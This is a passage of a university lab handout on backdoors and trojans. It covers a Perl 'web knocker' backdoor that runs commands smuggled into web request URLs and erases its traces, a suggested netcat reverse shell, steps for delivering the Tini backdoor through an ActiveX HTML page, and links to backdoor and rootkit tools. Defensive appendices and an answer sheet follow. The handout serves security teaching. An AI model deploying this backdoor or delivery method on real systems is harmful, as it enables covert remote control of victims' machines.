e. If we wish to erase all traces of our web knocker, we send the command “clean_up”
following the knocking code.
( http://target/command_to_execute=clean_up )
knock.pl
$var = "command_to_execute=";
$fname = "cmd_exec";
#Knocking code which precedes a command
#Temp FileName
system("cat /var/log/httpd/error_log | grep $var > $fname.new");
#Extract all lines from the log file
#which contain knocking code
if(! -e $fname. ".old")
{
system("touch $fname.old");
#Create a blank file if it does not exist
}
system("diff $fname.new $fname.old > diff_file");
#Find the commands which have not been executed
$LOGFILE = "diff_file";
open(LOGFILE) or die("Could not open diff file.");
foreach $line (<LOGFILE>) {
$index = index($line,$var);
$strt = $index + length($var);
#print "Starting : $strt : ";
$cmd=substr($line,$strt);
#Extract the command to be executed
if (! $cmd eq "")
{
if($cmd eq "clean_up")
{
system("rm -f $fname.*");
#Clean up temp files
system("rm -f $LOGFILE");
#We can also remove all traces from the logs as well
exit(1);
}
print "Executing : $cmd";
#Tell the user the command is executing
# Can be commented out if running in silent mode
system($cmd);
#Execute Command
}
}
close(LOGFILE);
system("mv $fname.new $fname.old");
#Store all completed commands in old file
23
23
We would ideally run this script as a cron job to ensure that it is constantly running in the
background, instead of running it in a while loop, because of which it will show up as a running
process.
Setting up Web Knocking: [On the RedHat7.2 machine]
1. Start the httpd daemon:
$ service httpd start
2. If the httpd daemon is not installed, install it using
$ rpm –uvh <apache installation file>
3. Once the http daemon has started, check whether you can view the homepage of the web
daemon.
4. Go to the browser and type http://a.b.c.d+1 e.g. http://57.35.6.167
5. If you cannot see a page, please ask the TA for assistance in setting up apache.
6. Once the web service has started, copy the perl script (knock.pl) to your machine.
7. To perform web knocking, we basically send a knocking code to the web server. In our
example, the knocking code is “command_to_execute=”, followed by the specific
command which we wish to execute.
Try numerous different commands such as ls, ll, ps, w, etc and note the results.
http://a.b.c.d+1/command_to_execute=ll
http://a.b.c.d+1/command_to_execute=ps
http://a.b.c.d+1/command_to_execute=w
Additionally, you could also execute netcat to open a reverse shell from the server to your
machine.
8. Now, at the command prompt type
$ perl knock.pl
This will cause the perl script to be run, executing all the commands that were requested.
We do this so we can simulate the web knocker being executed as a cron script. Although
setting this script up as a cron job is beyond the scope of this lab, we intend to simulate
its execution.
24
24
Screenshot #1 : Capture the output of the perl script
Your output should look like
[root@RedHat72 webknock]# perl knock.pl
Executing : ll
total 36
-rw-r--r-- 1 root root
0 Oct 10 23:12
-rw-r--r-- 1 root root 717 Oct 9 20:46
-rw-r--r-- 1 root root 735 Oct 10 23:12
drwxr-xr-x 2 root root 4096 Oct 9 20:36
-rwxrwxr-x 1 root root 1085 Oct 10 11:35
cmd_exec.new
cmd_exec.old
diff_file
hello
knock.pl
Executing : ps
PID TTY
TIME CMD
21023 pts/2
00:00:00 bash
21093 pts/2
00:00:00 perl
21102 pts/2
00:00:00 ps
Executing : w
23:12:15 up 2 days, 6:40, 4 users, load average: 0.08, 0.02, 0.01
USER
TTY
FROM
LOGIN@
IDLE
JCPU
PCPU WHAT
jeremy
:0
Sat19
?xdm?
7:24
0.03s /bin/sh
jeremy
pts/1
Sat19
2days 0.00s 0.56s kdeinit: kded
root
pts/6
23:12
0.00s 0.00s 0.00s /bin/bash
root
pts/2
57.35.6.166
23:11
0.00s 0.02s 0.00s perl knock.pl
[root@RedHat72 webknock]#
9. Under ideal conditions we would most likely set this up as a cron script so that it runs at
fixed intervals of time, say every five minutes.
10. To setup this script as a cron script, we will have to edit the crontab file in the /etc/ folder
Section 11: Using Explorer’s ActiveX to Propagate
Trojans/Backdoors
Trojans can be distributed to users of explorer because of the use of Explorer’s ActiveX
which executes scripts from webpages. We will now use a backdoor named Tini and a program
that converts EXEs to HTML called EXE2HTML to infect a virtual machine. For this we
download a program called EXE2HTML and Tini from: http://www.illmob.org/files.html
Tini is a small backdoor (3 kb) which will be used to open a remote shell. Size is
important because this method will fail if the file is too big since it will occupy around 4 times its
size in html. Hackers will probably replace Tini for a small Trojan which automatically
downloads a bigger more complex Trojan from the internet.
The first step is to convert Tini into an html file to be sent over the internet. For this we
perform the following set of commands:
25
25






Copy tini.exe to the same directory of EXE2HTML.EXE
Double click on EXE2HTML.EXE
Press Tab three times to get to the Source File: option.
Type the name of the file to be converted to html (i.e. tini.exe)
Press Tab five more times to reach [ ] None and check it by pressing enter
Press Tab nine more times to reach [ ] Compile HTML.
Your window should now look something similar to the following screen shot:

Press Enter.
You will now have an html file named OUTPUT.HTML. This page contains the file
Tini.exe and the code necessary for internet explorer. An attacker will probably place this page
in a web server and give links to the people he wants to infect. We will Double click on this html
file to open it using internet explorer. This simulates opening a web page from a web server. You
will see a window like the following:
26
26
Internet Explorer tries to warn you but most people just click Yes to continue. In versions 5.0/5.1
of Internet Exporer, it does not ask if you want to run the ActiveX control.

Click Yes to accept.
Because the html file was opened, the file WINDRV.HTA was created on Start>All
Programs>Startup which contains the program to be executed.
27
27
The executable webpage is placed here because it will now be executed every time the
computer boots.

Reboot your virtual machine.
After the reboot, turn on another virtual machine to telnet from. It can be either windows or
linux. Type:

telnet <Target IP> 7777
7777 is the port number of Tini. Now wait a few seconds and press Enter. It is important that
you press Enter or you will not see anything. In linux you will now get a shell as illustrated on
the following screen shot:
28
28
In windows you will see the following:
29
29
General Questions
How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and or improvements do you suggest for this lab? Please be very specific and if
you add new material give the exact wording and instructions you would give to future students
in the new lab handout. You may cross out and edit the text of the lab on previous pages to make
corrections. What corrections and or improvements do you suggest for this lab? Please be very
specific and if you add new material give the exact wording and instructions you would give to
future students in the new lab handout. You need to be very specific and provide details. You
need to actually do the suggested additions in the lab and provide solutions to your suggested
additions. Caution as usual: only extract and use the tools you downloaded in the safe and
approved environment of the network security laboratory.
30
30
Appendix A: Win XP Safeguarding
http://www.windowsecurity.com/articles/Hidden_Backdoors_Trojan_Horses_and_Rootkit_Tools
_in_a_Windows_Environment.html
Is your system secure? How do you know? A machine is very rarely targeted for an attack for any other
reason than because it was vulnerable. One of the first steps in being proactive is to assess your basic
security policy rules and requirements. I think that having an up-to-date anti-virus software installed is a
primary concern, and even it won't fully protect your machine itself, it can be a lifesaver, providing good
protection against most viruses and trojans.
Another good practice is to look routinely at any modification of programs to discover new, odd services or
processes. Administration scripts are very useful tools in this regard, particularly when dealing with multiple
systems. One might also wish to consider host scanning on your network from time to time. If you suspect
that there is an open port at your computer, give a snapshot to check whether it is authorized or no. You
may use network, application diagnosis and troubleshooting programs such as TCPview (Fig. 5) [12], FPort
[13], Inzider [14], Active Ports (Fig. 6) [15], or Vision [16].
Fig. 5 TCPview tool allows to locate which application opened a port in your computer. Like Active Ports, it
tells you what is running on which port.
31
31
Fig. 6 Active Ports in action
These tools provide a means to identify the specific application opening the port. Moreover, they let one
avoid using Netstat, if it suspects that is has been replaced or infected. This brings me to another interesting
consideration: whichever tool is used, it is a good practice to use original tools previously uploaded on a
trusty diskette or CD-ROM when attempting to make a check of the system. If any doubt exists whether
individual tools are original ones, checksum them to check if they match the installation CD-ROM.
In this regard, ListDlls [17] and Process Explorer [18] (Fig. 7) can certainly be useful if finding any suspect
signs of trojan infected or backdoored processes.
32
32
Fig. 7
Process Explorer that displays object processes and related DLL libraries
These programs with their DLL libraries give some assistance and provide additional information on handling
incidents, investigations and conducting analysis to gather legal evidence in view of criminal prosecution.
May I also suggest that one pay closer attention to the registry keys that are responsible for starting
programs on the system startup. In most cases, these registry elements usually contain some indication of
how the intruder gained access, from where, when, etc. These are:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\ControlSet001\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\ControlSet\Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows (run)
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows (run)
HKEY_CLASSES_ROOT\exefile\shell\open\command
33
33
It is extremely important to establish consistent access permissions on these keys and activate inspection
tools to continuously monitor for any malicious attempts. The same applies to those system directories and
files that are security critical. A commonly accepted computer security policy usually starts with a “sound”
firewall as a guard against backdoors. Even if the intruder manages to install a backdoor, the firewall will
block him from getting to the listening port.
In fact, bypassing a firewall is not a plug-n-play thing, but I take liberty to serve a nice dose of pessimism.
There are known hacker tools that can get through even the most hardened firewalls.
However this is beyond the scope of this article, so I would recommend reading the document available at
the address: http://www.spirit.com/Network/net0699.txt.
Finally, I would like to raise your awareness about a certain issue. Once your machine has been
compromised and the hacker has gained total administrative access, be very careful in recovering the
system from the back-up copy or the disk image! I have personally experienced a situation, where someone
replaced a WWW site. The system administrator had retrieved the system from a back-up copy, patched the
system, updated the access database and changed passwords. Thus, he has considered the server perfectly
safe. But he overlooked the fact, that the intrusion had been made long before he made the copy containing
a back-doored version. So, I would strongly recommend checking the system whenever it is backed up.
Hackers increasingly threaten the network community with their new techniques, backdoors and Trojan
horses. Therefore we must take steps to guard against known methods of hacking, even though their will
still be a large number of worrying factors we don’t know about. The only thing is absolutely obvious – you
never know how long your immune system can hold out before breaking down.
Tools:
[1] Netcat - http://www.hackerscor.com/km/files/hfiles/ncnt090.zip
[2] iCMD - http://go8.163.com/lmqkkk/mytools/iCmd.exe
[3] RemoteNC - http://go8.163.com/lmqkkk/mytools/remotenc.zip
[4] Tini - http://go8.163.com/lmqkkk/mytools/tini.exe
[5] WinShell - http://go8.163.com/lmqkkk/mytools/Winshell4.0.zip
[6] CGI-backdoor - http://go8.163.com/lmqkkk/mytools/cgi.zip
[7] Remote Administrator - www.radmin.com
[8] TightVNC - http://www.tightvnc.com/download.html
[9] Rootkit v.0.44 – www.ndsafe.com/fires/rk_044.zip
[10] Rootki v.0.40 - http://www.megasecurity.org/Tools/Files/Nt_rootkit0.40.zip
[11] IIP Driver - http://www.pedestalsoftware.com/intact/iipdriver.htm
[12] TCPview – www.winternals.com
[13] Fport - http://www.foundstone.com/knowledge/proddesc/fport.html
[14] Inzider - http://ntsecurity.nu/toolbox/inzider/
[15] Active Ports - http://www.ntutility.com/freeware.html
[16] Vision - http://www.foundstone.com/knowledge/proddesc/vision.html
[17] ListDlls – http://www.sysinternals.com/ntw2k/freeware/listdlls.shtml
[18] Process Explorer - http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
[19] LANguard Network Security Scanner
34
34
Appendix B: Trojan Removal
http://forums.majorgeeks.com/showthread.php?t=35407
Introduction:
This article reflects countless hours of experience removing spyware, trojans and viruses. If you can take
the time to do all of these steps, there's a good chance your problem will be solved by following this
article. While all of these steps are not required for each case, they should be beneficial to all. In general,
these steps should work on all versions of Windows XP, but some may not apply to older operating
systems like Windows 98. If you need to post a new thread requesting support be sure you have done all
of these steps, tell us you did so, what symptoms you are experiencing and then follow any directions we
give you exactly. As you can see from reading some of the threads, people often ask for advice,
then only do bits and pieces. This will not help you; It will frustrate us and take more time than
required
Section 1 makes sure your computer is not at risk for hard to remove viruses. Section 2 covers cleaning
and removal. Section 3 makes suggestions on securing your machine after clean up.
Complete ALL the applicable steps of Getting Prepared and then you MUST complete all 4 steps from
Scanning And Cleaning Steps.
Getting Prepared; Steps to be sure your system is ready to be scanned:
1: Disable System Restore temporarily (WinXP & WinME only) if you are infected; Any trojans, spyware,
etc. you may have picked up could have been saved in System Restore and are waiting to re-infect you.
Since System Restore is a protected directory, your tools can not access it to delete files, trapping viruses
inside. Please follow instructions to do that here: http://forums.majorgeeks.com/showthread.php?t=31668
2: Network Security, Workstation Netlogon Services & Remote Procedure Call (RPC) Helper (Windows
XP, 2K, NT); Only do this step if you have the about:blank or home search hijack. You need to
check to see if any of the following three Windows services are running:



Network Security Service
Workstation Netlogon Service
Remote Procedure Call (RPC) Helper
To do this, click Start, Run, and enter the following in the Open box: "services.msc" (without the quotes).
Then click OK. Now, in the Services window that pops up look for exactly the following service
names (no others) "Network Security Service" or "Workstation Netlogon Service" or "Remote
Procedure Call (RPC) Helper". (NOTE: DO NOT DISABLE: Remote Procedure Call (RPC) or Remote
Procedure Call (RPC) Locator. They are both required services and are unrelated to the hijacker.). You
could have more than one of the 3 mentioned bad services, so look for all of them. If you find these
services, you must right click on it to bring up the service Properties window and do the following (refer to
the Figure too):
Step 1: Stop the service by click the Stop button.
35
35
Step 2: Now, disable it by changing the Startup type to Disabled and click Apply
If you do not find these exact services, do not worry and just skip this step. DO
NOT DISABLE
ANYTHING UNLESS THE EXACT WORDING OF THE SERVICE NAMES IS
MATCHED.
3: Enable viewing of hidden files and folders and extensions; Some programs can hide this way by not
being visible in Windows. Start Windows Explorer and click on your main hard drive, usually c:\. Then
select Tools from the top of Windows Explorer and then Folder Options. Go to the View tab. Scroll down
to the folder icon that says Hidden files and folders and check show hidden files and folders. Also, right
below it, uncheck the hide file extensions for known types. Not doing this could allow file extensions
commonly used by trojans and spyware to be hidden, for example a file ending in .exe or dll making
manually finding it, if needed, difficult to impossible.
4: Downloading Tools; Download the following tools and save in your favorite download folder or create
one, for example C:\Temp or C:\Downloads. And then install, update, and configure as indicated below.
While this may seem like overkill, there currently is no one perfect removal tool. Because of this, to
properly find and fix your problem, you need to try a variety of programs.
TIP: Create a folder on your C:\ drive for the tools/utilities you will need to use. For example: Navigate to
your C:\ folder and create a right click on a blank spot in the window > choose New > Folder. Name this
folder Spyware Tools. Now you can save the tools you will be downloading to this folder and if you prefer,
create sub-folders named for each individual utility.
Ad-Aware SE.......Install, click Check for Updates now and get any updates, then exit.
Ad-Aware VX2 Cleaner Plug-In.....Install only
CCleaner.............Install only, then exit
Spybot................Install, do the search for updates now and get any updates, then exit.
Spybot - Search and Destroy DSO Exploit Fix - Install this patch on top of Spybot to fix the DSO Exploit
bug
SpywareBlaster...Install, click Download Latest Protection Updates, Check for Updates, and then Enable
All Protection, then exit. It does a great job of blocking known vulnerabilities as well as known malicious
websites.
McAfee AVERT Stinger.....No installation required! Ready to run as is.
CWShredder......No installation required! Just unzip it to a folder.
Kill2me..............No installation required! Just unzip it to a folder.
about:Buster......No installation required! Just unzip it to a folder. Click Update and download any
before scanning.
HSRemove........No installation required! Ready to run as is. (Only for WinNT, 2K, XP)
36
36
Your system is now ready to be properly scanned for spyware, trojans and viruses.
Scanning And Cleaning Steps: (These 4 steps are NOT optional and must be run!!)
1: Virus And Trojan Scanning (do not skip these two scans or you will be asked to run them before
continuing)
a) Win9x (Windows 95, 98, 98SE) users boot normal mode.



do an online scan at Trend Micro's Free Online Virus Scan
do an online scan at Symantec Security Check
now boot in safe mode (and remain there) and run McAfee AVERT Stinger. See how to boot in
safe mode below.
b) And Windows XP, 2000, NT, ME, users boot in "safe mode with networking support" (and remain in
there). See how to boot in safe mode below.



do an online scan at Trend Micro's Free Online Virus Scan
do an online scan at Symantec Security Check
run McAfee AVERT Stinger
NOTE: If using a non-IE browser, you can use Trend Micro's online scan with Java located HERE
How to boot in safe mode: To boot into safe mode, restart your computer and tap the f8 key (after first
black and white screen, but before the Windows splash screen) until you get to a black and white screen
asking you what to do. With Windows XP, 2000, NT, ME: Use your arrow keys and select "safe mode with
networking support".
Booting in safe mode is important because best results are achieved since safe mode disables most
drivers and running programs. If you have a problem for any reason trying to run these scans in safe
mode, do them in normal boot mode but make sure you tell us that in any subsequent message you may
need to post about your problem,
Important Note Before continuing with scans:
To provide the greatest ability for the scanners to properly detect and remove all forms of malware, make
sure to close any other applications that are running on your system especially browsers before you run
these tools. It is in your best interest to follow this directive. So disconnect from the internet now and
close all browsers and any other applications you have running now and then continue with step 2 below.
2: Clean Your Hard Drive; Remove temporary internet and other files not needed with CCleaner. Run
CCleaner with the default options to clean out temporary files. Optionally, check the clean "Delete
Index.dat" checkbox. Only use the Windows tab and select Run Cleaner. Do not run any other options
from other tabs.
3: Main Spyware Scan And Removal; Scan your machine with Ad-Aware SE (remember to install the AdAware VX2 Cleaner Plug-In for it) and Spybot. Look for the Immunize feature in Spybot and use it. Make
sure you install the Spybot DSO Exploit patch before running a scan with Spybot.
4: Secondary Spyware Scan And Removal: Other Removal Tools; Run the other programs you
downloaded; CWShredder (make sure you select Fix), Kill2me, about:Buster and HSRemove. They are
free, standalone and easy to use. Note: about:Buster and HSRemove need only be run if you are
having about:blank or HomeSearchAssistent hijacks. Also, note that HSRemove is not compatible
37
37
with Win9x or WinMe systems.
OPTIONAL Steps: require you reboot back to normal mode.
1: OPTIONAL: If you can not remove the stubborn "Only the Best" aka "HSA" HIJACKER please view this
thread by Chaslang, an expert in removing these things, can be found here:
http://forums.majorgeeks.com/showthread.php?t=38772
2: OPTIONAL: Scan With Hijack This; If you have gotten this far without success, you may need to
download Hijack This!. Taking a few minutes to read this tutorial is required before posting a logfile so
that you can get the most from it and make it easier to diagnose. Please post your logfile as an
attachment and only when asked.
Make sure that you tell us in your post that you've already followed the instructions on this page
so we don't waste your and our time by posting a link to it in your thread. Also, it would be helpful
to indicate what kind of problems the above steps have found and fixed (or failed to fix).
Alternative Scans - If still having problems
If you are still having problems after performing all the above, these alternative scans below may prove to
be useful. As mentioned above, it would be good to perform these in safe mode since it may assist in the
ability to remove an infection. However, there are cases where a problem does not show itself completely
until you boot in normal mode. So first run these scans in normal boot mode, and if they have problems
cleaning any particular items repeat the scan in safe mode to see if it helps. Always keep track of what
these scans find (save logs or take notes), and report them back in your thread to anyone helping you.
Bitdefender online scan
RavAntivirus online scan <-- select Auto Clean then click Scan My PC
TrojanScan online scan
a-squared (a²) Free edition free but requires an email address to register
avast! Virus Cleaner Tool
ADS SPY - Alternate Data Streams Spy from Merijn
Recent browser hijackers started using ADS to hide their files, and very few anti-malware scanners detect
this. Use ADS Spy to find and remove these streams. Note: this app also displays legitimate ADS
streams. Don't delete streams if you are not completely sure they are malicious! You should consult
with an expert before deleting any files with this tool.
Keeping your computer safe and secure:
1: Windows Update; Update Windows at Microsoft Windows Update. Just click on Start, then Windows
Update. Many security loopholes are found and exploited and Microsoft patches for these. Millions of
people were affected by the Blaster worm because they were not up to date, as an example. If you're not
up to date, you're at risk. You can setup automatic updates in your control panel; go to Start, Settings,
Control panel.
2: Remove Microsoft Java; Microsofts no longer supported version of Java is often a source of installed
spyware and hijacks so it is a good idea to remove Microsoft Java Virtual Machine and Install Sun Java.
To remove it follow these steps.
1: Select Start > Run and Enter "RunDll32 advpack.dll,LaunchINFSection java.inf,UnInstall" in the Open
box, and click ok.
38
38
2: Click Yes to confirm that you want to remove the Microsoft VM
3: When prompted, reboot the computer
4: Remove the following items: (Systemroot is where windows is installed (usually C:\Windows)
The \%Systemroot%\Java folder
The file java.PNF from the \%Systemroot%\inf folder
The files jview.exe and wjview.exe from the \%Systemroot%\system32 folder
The registry subkey HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Java VM
The registry subkey HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ InternetExplorer \
AdvancedOptions \ JAVA_VM
OR
Download and run the MSJVM Removal Tool 1.0a
5: Install Sun Java here: http://java.com/en/
You can choose a different language if you need it from the top menu on that page.
(Any files or registry entries not found or errors can be ignored and go to the next step)
Optionally, consider replacing your web browser with a free alternative like FireFox or a shareware
browser like Opera, for example.[IMG]
39
39
ECE 4112 Internetwork Security
Lab 6: Backdoors and Trojans
Group Number: _________
Member Names: ___________________
_______________________
Answer Sheet
Q1.1.1. Is the binary filing the same, or has it been altered? Compare the file sizes of the file on
the two systems as it is transferred back and forth.
Q1.1.2. What can you say about Netcat’s ability to transfer binary files?
Q1.1.3. What do you conclude from this?
Screenshot #1:Take a screenshot of these windows and submit it with your report.
Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow.
Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways.
Suggest another way that Netcat could be used (in detail).
Q1.1.6. What defenses could you use against an attack like netcat backdoor?
40
40
Section 2
Screenshot #2: Take a screenshot of the ethereal output.
Q2.1.1. What defenses could you use against an attack like icmp backdoor?
Q3.1.1. How would you detect that VNC was installed and/or running on your Windows
machine?
Q3.1.2. How would you detect that VNC was installed on your Linux machine?
Screenshots #3, #4:Take a screenshot of the VNC server screen and another of the VNC
viewer accessing the VNC server. Turn these in with your report.
Section 3
Q3.1.3 What defenses could you use against an attack like VNC?
Section 4
Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the
password file of the WinXP victim.
41
41
Section 5
Q5.1.1.What happens when you do what the email says?
Q5.2.2. What suggestions do you have about improving the security of such email programs?
Screenshot #6. Take a screen shot of the remote access over the telnet connection and
hacked login.
Screenshot #7. Turnin a shot of the new process created.
Screenshot #8. Screen shot of the popup box with the path of the nc.exe program and
command line arguments.
Screenshot #9. Screenshot of the attacking machine running the ack tunneling attack.
Section 9: Port Knocking
1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8
subnet to access port 22 using an encrypted knock sequence.
2) It was mentioned that port knocking began with a virus. Why would a virus writer want
to include port knocking in the backdoor.
42
42
3) No mention was made as to how port knocking servers finally close the open firewall
port. List 2 ways which could be employed to close the port.
Section 10. Tricking users into opening backdoors.
Q10.1.1 Does the notepad program appear after closing the calculator program?
Q10.1.2 Can you see notepad.exe in the processes window this time?
Q10.1.3 How do you detect a Trojan of this kind?
General Questions
How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and or improvements do you suggest for this lab? You may cross out and edit
the text of the lab on previous pages to make corrections. What corrections and or improvements
do you suggest for this lab? Please be very specific and if you add new material give the exact
wording and instructions you would give to future students in the new lab handout. You need to
be very specific and provide details. You need to actually do the suggested additions in the lab
and provide solutions to your suggested additions. Caution as usual: only extract and use the
tools you downloaded in the safe and approved environment of the network security laboratory.
Turn-in Checklist
1- Screenshots 1 to 9.
2- Answer Sheet with answers.
3- Any additions for the lab.
43
43
Related documents
Base Words - Tuesday night spelling
Base Words - Tuesday night spelling
KRRC MSPowerPoint Prop Template 2008
KRRC MSPowerPoint Prop Template 2008
Parallel Port Commands In Turing
Parallel Port Commands In Turing
ANNEX C: JURONG PORT`S GREEN INITIATIVES Since starting
ANNEX C: JURONG PORT`S GREEN INITIATIVES Since starting
Pentest com script shell & Perl
Pentest com script shell & Perl
Chapter 3
Chapter 3
Download
advertisement